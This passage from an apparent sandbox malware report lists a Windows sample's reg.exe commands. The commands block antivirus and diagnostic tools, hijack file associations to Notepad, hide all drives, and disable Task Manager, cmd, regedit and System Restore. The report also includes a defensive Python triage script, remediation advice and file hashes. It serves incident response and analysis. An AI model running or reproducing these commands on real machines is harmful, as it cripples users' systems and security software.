      The list targets security products (Microsoft Defender: MSASCui.exe, msmpeng.exe, SecurityHealthSystray.exe; Avast and AVG: AvastSvc.exe, AvastUI.exe, aswEngSrv.exe, wsc_proxy.exe, AVGUI.exe, AVGSvc.exe; McAfee: mcshield.exe, McUICnt.exe, MfeAVSvc.exe, mfefire.exe, mfevtps.exe and the other Mc*/mfe* names; Kaspersky: avp.exe, avpui.exe, kav.exe; Dr.Web: spideragent.exe, dwscanner.exe; ESET: ekrn.exe, egui.exe, eguiProxy.exe; Bitdefender: bdagent.exe, bdservicehost.exe, bdredline.exe, bdreinit.exe and the Bd*/ProductAgent* names; Malwarebytes: mbam.exe, mbamtray.exe, MBAMService.exe, MBAMWsc.exe, MbamPt.exe, mbuns.exe, malwarebytes_assistant.exe), built-in diagnostic and recovery tools (taskmgr.exe, regedt32.exe, msconfig.exe, perfmon.exe, resmon.exe, msinfo32.exe, msdt.exe, rstrui.exe, RecoveryDrive.exe, control.exe), analysis tools and sandboxes (ProcessHacker.exe, procexp.exe, procexp64.exe, SbieSvc.exe, VirtualBox.exe, vmware.exe), browsers, archivers and file managers (7zFM.exe, WinRAR.exe, TOTALCMD*.EXE) and game-cheat tools (artmoney.exe, chemax.exe, Cheat Engine.exe). msconfig.exe, firefox.exe, dwscanner.exe, spideragent.exe and aswEngSrv.exe appear twice. Because the policy is enforced only by Explorer, the blocked tools can still be started from a command prompt or by a service; the list hampers the interactive user rather than the products' own services.
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "100" /t REG_SZ /d "aswidsagent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "101" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "102" /t REG_SZ /d "AvastBrowserCrashHandler64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "103" /t REG_SZ /d "AvastBrowserCrashHandler32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "104" /t REG_SZ /d "AvastBrowserCrashHandler86.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "105" /t REG_SZ /d "MSASCui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "106" /t REG_SZ /d "msdt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "107" /t REG_SZ /d "MRT.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "108" /t REG_SZ /d "msiexec.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "109" /t REG_SZ /d "msseces.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "110" /t REG_SZ /d "control.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "111" /t REG_SZ /d "mmc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "112" /t REG_SZ /d "opera_crashreporter.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "113" /t REG_SZ /d "opera_autoupdate.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "114" /t REG_SZ /d "opera.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "115" /t REG_SZ /d "MicrosoftEdge.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "116" /t REG_SZ /d "MicrosoftEdgeCP.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "117" /t REG_SZ /d "MicrosoftEdgeSH.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "118" /t REG_SZ /d "launcher.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "119" /t REG_SZ /d "regedit.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f
- Sets desktop wallpaper using registry
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\mp3file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\mp4file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\exefile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies system executable filetype association
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\pngfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\icofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\pdffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\docxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\docfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\csvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\hfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\cppfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\oggfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\avifile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\isofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\zipfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\rarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\pptfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\mkvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\xlsxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\jpgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\jpegfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\tiffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\tmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\dmgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\slnfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\7zfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\afile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\aafile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\001file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\allfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\binfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\asmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\svgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\bmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\gzfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\cabfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\cfgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\cmdfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\comfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies system executable filetype association
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\ctfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\curfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\dllfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\htmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\htmlfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\wshfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\vbsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\jsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\logfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\wsffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\jarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
- Modifies registry class
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d "67108863" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d "67108863" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v RestrictToPermittedSnapins /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "121" /t REG_SZ /d "cmd.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "120" /t REG_SZ /d "powershell.exe" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /d "0" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t REG_DWORD /v "DisableRegistryTools" /d "1" /f
C:\Windows\SysWOW64\shutdown.exe  shutdown -r -t 20
- Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\LogonUI.exe  "LogonUI.exe" /flags:0x4 /state0:0xa3954855 /state1:0x41c64e6d
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
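The reg.exe command lines above are the whole of this sample's tampering: an Explorer DisallowRun list, shell\open\command hijacks that point dozens of file classes at notepad.exe, drive-hiding bitmasks, and policy values that switch off Task Manager, regedit, cmd.exe and System Restore. The Python script below is an added example, not part of this sandbox report and not code from the sample. It parses `REG ADD` lines in the form recorded here, groups them by effect, decodes the NoDrives/NoViewOnDrive bitmask, and models where a 32-bit reg.exe (the listing shows C:\Windows\SysWOW64\reg.exe) actually lands its HKLM\SOFTWARE writes under WOW64 redirection. Assumptions: the input list is a constructed subset of the lines above; the WOW64 shared-subtree list is deliberately partial (only what this sample touches); the "trailing whitespace defeats the block" flag reflects Explorer comparing the DisallowRun string against the exact executable file name.

```python
from __future__ import annotations
import shlex
from dataclasses import dataclass

# Constructed input: nine of the reg.exe command lines listed above, copied verbatim.
SAMPLE_CMDLINES = [
    r'REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "79" /t REG_SZ /d "procexp.exe" /f',
    r'REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "81" /t REG_SZ /d "BdVpnService.exe " /f',
    r'REG ADD "HKEY_CLASSES_ROOT\exefile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f',
    r'REG ADD "HKEY_CLASSES_ROOT\jpgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f',
    r'REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d "67108863" /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f',
    r'REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f',
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /d "0" /f',
]

HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE",
         "HKCR": "HKEY_CLASSES_ROOT", "HKU": "HKEY_USERS"}
# HKLM\SOFTWARE subtrees a 32-bit process writes WITHOUT WOW64 redirection.
# Deliberately partial (assumption for this example): only the subtrees this sample touches.
WOW64_SHARED = ("SOFTWARE\\CLASSES\\", "SOFTWARE\\POLICIES\\",
                "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\")
# ProgIDs whose shell\open\command launches code rather than opening a document.
EXEC_PROGIDS = {"exefile", "comfile", "batfile", "cmdfile", "cplfile", "dllfile",
                "vbsfile", "jsfile", "wsffile", "wshfile", "jarfile"}
TOOL_POLICIES = {"DISABLETASKMGR": "Task Manager", "DISABLEREGISTRYTOOLS": "regedit",
                 "DISABLECMD": "cmd.exe", "DISABLESR": "System Restore",
                 "NORUN": "Run dialog", "NOCONTROLPANEL": "Control Panel"}


@dataclass
class RegAdd:
    key: str           # hive spelled out, e.g. HKEY_CURRENT_USER\...
    value: str | None  # None = the key's default value (/ve)
    vtype: str         # reg.exe defaults to REG_SZ when /t is omitted
    data: str


def _unquote(tok: str) -> str:
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def parse_reg_add(cmdline: str) -> RegAdd | None:
    """Parse `REG ADD <key> [/v name | /ve] [/t type] [/d data] [/f]`."""
    # posix=False keeps Windows backslashes literal while still grouping "quoted strings".
    toks = shlex.split(cmdline, posix=False)
    if len(toks) < 3 or [t.upper() for t in toks[:2]] != ["REG", "ADD"]:
        return None
    hive, sep, rest = _unquote(toks[2]).partition("\\")
    entry = RegAdd(HIVES.get(hive.upper(), hive.upper()) + sep + rest, None, "REG_SZ", "")
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        arg = _unquote(toks[i + 1]) if i + 1 < len(toks) else ""
        if flag == "/v":
            entry.value = arg
        elif flag == "/t":
            entry.vtype = arg.upper()
        elif flag == "/d":
            entry.data = arg
        else:              # /ve, /f or an unknown switch: takes no argument
            i += 1
            continue
        i += 2
    return entry


def wow64_effective_key(key: str) -> str:
    """Where a 32-bit process's write to `key` lands on 64-bit Windows."""
    hive, _, path = key.partition("\\")
    up = path.upper() + "\\"
    if hive.upper() != "HKEY_LOCAL_MACHINE" or not up.startswith("SOFTWARE\\"):
        return key
    if up.startswith("SOFTWARE\\WOW6432NODE\\") or up.startswith(WOW64_SHARED):
        return key
    return f"{hive}\\SOFTWARE\\WOW6432Node{path[len('SOFTWARE'):]}"


def drives_from_mask(mask: int) -> str:
    """NoDrives / NoViewOnDrive bitmask: bit 0 = A:, bit 25 = Z:."""
    return "".join(chr(ord("A") + b) for b in range(26) if mask >> b & 1)


def _to_int(s: str) -> int:
    return int(s, 16) if s.lower().startswith("0x") else int(s)


def classify(entry: RegAdd) -> tuple[str, str]:
    """Map one REG ADD to (category, detail)."""
    k, v = entry.key.upper(), (entry.value or "").upper()
    if k.endswith("\\POLICIES\\EXPLORER\\DISALLOWRUN"):
        if entry.data != entry.data.strip():   # Explorer matches the file name exactly,
            return "disallow_run_whitespace", entry.data.strip()  # so stray spaces defeat the block
        return "disallow_run", entry.data
    if k.startswith("HKEY_CLASSES_ROOT\\") and k.endswith("\\SHELL\\OPEN\\COMMAND") and entry.value is None:
        progid = entry.key.split("\\")[1]
        kind = "executable" if progid.lower() in EXEC_PROGIDS else "document"
        return "assoc_hijack", f"{kind}:{progid}->{entry.data}"
    if v in ("NODRIVES", "NOVIEWONDRIVE"):
        return "hide_drives", drives_from_mask(_to_int(entry.data))
    if v in TOOL_POLICIES:
        detail = TOOL_POLICIES[v]
        if v == "DISABLECMD" and _to_int(entry.data) == 2:
            detail += " (interactive only; batch scripts still run)"
        return "disable_tool", detail
    return "other", f"{entry.key}\\{entry.value or '(Default)'}={entry.data}"


def triage(cmdlines: list[str]) -> dict[str, list[str]]:
    """Group parsed REG ADD lines by effect; also list writes that WOW64 silently relocates."""
    out: dict[str, list[str]] = {}
    for line in cmdlines:
        entry = parse_reg_add(line)
        if entry is None:
            continue
        landed = wow64_effective_key(entry.key)
        if landed != entry.key:
            out.setdefault("wow64_redirected", []).append(landed)
        cat, detail = classify(entry)
        out.setdefault(cat, []).append(detail)
    return out


if __name__ == "__main__":
    for cat, items in triage(SAMPLE_CMDLINES).items():
        print(cat, *items, sep="\n  ")
```

What the grouped output makes visible to a responder: DisallowRun is a per-user Explorer policy enforced only for launches that go through the shell, so services such as bdservicehost.exe or ekrn.exe that are started by the Service Control Manager are not stopped by it, and the three names written with a trailing space do not match anything; DisableCMD=2 removes the interactive prompt but leaves batch processing on, which the sample needs for its own .bat files; NoDrives and NoViewOnDrive at 67108863 (0x3FFFFFF) cover every letter A through Z; the exefile and comfile hijack means double-clicking any program opens Notepad, which is why cleanup is easiest from another account or an offline boot. The HKCU policy values can simply be deleted, and exefile and comfile restore to the default `"%1" %*`, but the document classes (jpgfile, pdffile and the rest) should be restored from a known-good machine rather than guessed. The WOW64 list shows that the Winlogon write made by the 32-bit reg.exe lands under WOW6432Node, not in the key Winlogon itself reads.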
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
  Filesize 848B
  MD5    e59c7d9f080b068e3118e81385f467e7
  SHA1   78ea57d55558847121cb70367d10dc9c6e833a26
  SHA256 5c9bee6ecba73cda027b99dea013cd54f53524e35750da629f53c841d75b6e8f
  SHA512 b452ccd1009f7976f4ba2f44c117bf2faee0768f22e9c55e41f16d4695cdcd296f0a4321de8dc4855536b364844dffad5df0d46cb711f1c49f024e3afc043475
C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exe
  Filesize 27KB
  MD5    daf9159a8fbc9510e9dc380c2cae924d
  SHA1   5e1bf2dbe567ffc04c194b31de4f4e15c630cae5
  SHA256 43118bc6f1c03b9f749efc244d7fd0553d45ec50ae2e4ea363e17f85f832290f
  SHA512 88b01d7b3f76530124f8149668879b9cf66075f228e8c3000d75383bf10c11eb43bd5c83b445b19ec24de578415a26153d3fc0d329b6dd195f09f1226a960ea8
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.00
  Filesize 28KB
  MD5    067ab27355743f95929213e08bc60ebb
  SHA1   376436cef2b119a75cf29500e3efb37061b0fa16
  SHA256 e621092e9b620bc589a4dd89d791352d266b139ceb9b3f13ddded5b536b52441
  SHA512 97add0ebcee845d1c47eef6f91d990fccc025509c748e8d612716ac2342144578f4e29247f4824aeefaf5ee143b31837fb5eb487726855ed43a42ccd14431ba0
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat
  Filesize 28KB
  MD5    fed4789f3fbd52e720ae7234600d5652
  SHA1   273db24c6044f936359bdd272eb14c0fb2f6e117
  SHA256 03dfd466366ffbe32e9e487cdc2136c62b4b4f57c365e255ef8e0c36991fb8b0
  SHA512 ff2dc7069ea16bea767b1f9f6efa60b15cef3573a8de5e92d4766646e030f3db89fb4789cf51526b7d10d6d03b1348748d1f7c1162f7382e943261102f6d0435
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.00
  Filesize 344KB
  MD5    9311b831777f14f7c81af8cb67259a3b
  SHA1   8178284b89f5429f4ab6143a652944da563124c2
  SHA256 1479da32b193676068062236730ce9a5dbcae727ec0eea63b18252f9cb744707
  SHA512 86d334db1eca671d2af34786337316a6570236ad12c23fa3f84884776d550abcc6403100e17b23b97c761e97dedd8b8b135c4d49332623894c5f57a5e6eb1fc4
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.01
  Filesize 2KB
  MD5    0f92fcbacb68fb014cfa248c31448e6b
  SHA1   64d5dea54df6a03490849d04a174a7e8d690ebb4
  SHA256 8b2d86fe88a75c0e0c312fdc7d1f54d113d33af729d2be52622f2b538a7a7049
  SHA512 10f8f0fa7fdaede1b369e35e9bb0cf44ef7de02d4c7c3d644b5c2e80b405f9927acd167c996957e18f0a38fe41be4afdfd420bbe8a539332a93238565576236b
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe
  Filesize 44KB
  MD5    a1cd6a64e8f8ad5d4b6c07dc4113c7ec
  SHA1   60e2f48a51c061bba72a08f34be781354f87aa49
  SHA256 b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577
  SHA512 87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat
  Filesize 1KB
  MD5    9492f33971cfd6b77484342e42097731
  SHA1   6cce167289894928d4bc6da2e263a354cbe2b174
  SHA256 2f4637dd7a3125bf60d5651cc851c8ef9cf7c461dd89eed404dd9f5a381844e4
  SHA512 c685295c91f2765ec3e3ab72fa7c124335d4d570df418427b11c7cd96e3cad5ad8563bc114052de0ecc9d909f671f72663c72015f5415f44c67d24ca21462dcc
- memory/116-159-0x0000000000000000-mapping.dmp
- memory/260-158-0x0000000000000000-mapping.dmp
- memory/332-200-0x0000000000000000-mapping.dmp
- memory/464-179-0x0000000000000000-mapping.dmp
- memory/568-182-0x0000000000000000-mapping.dmp
- memory/640-155-0x0000000000000000-mapping.dmp
- memory/652-170-0x0000000000000000-mapping.dmp
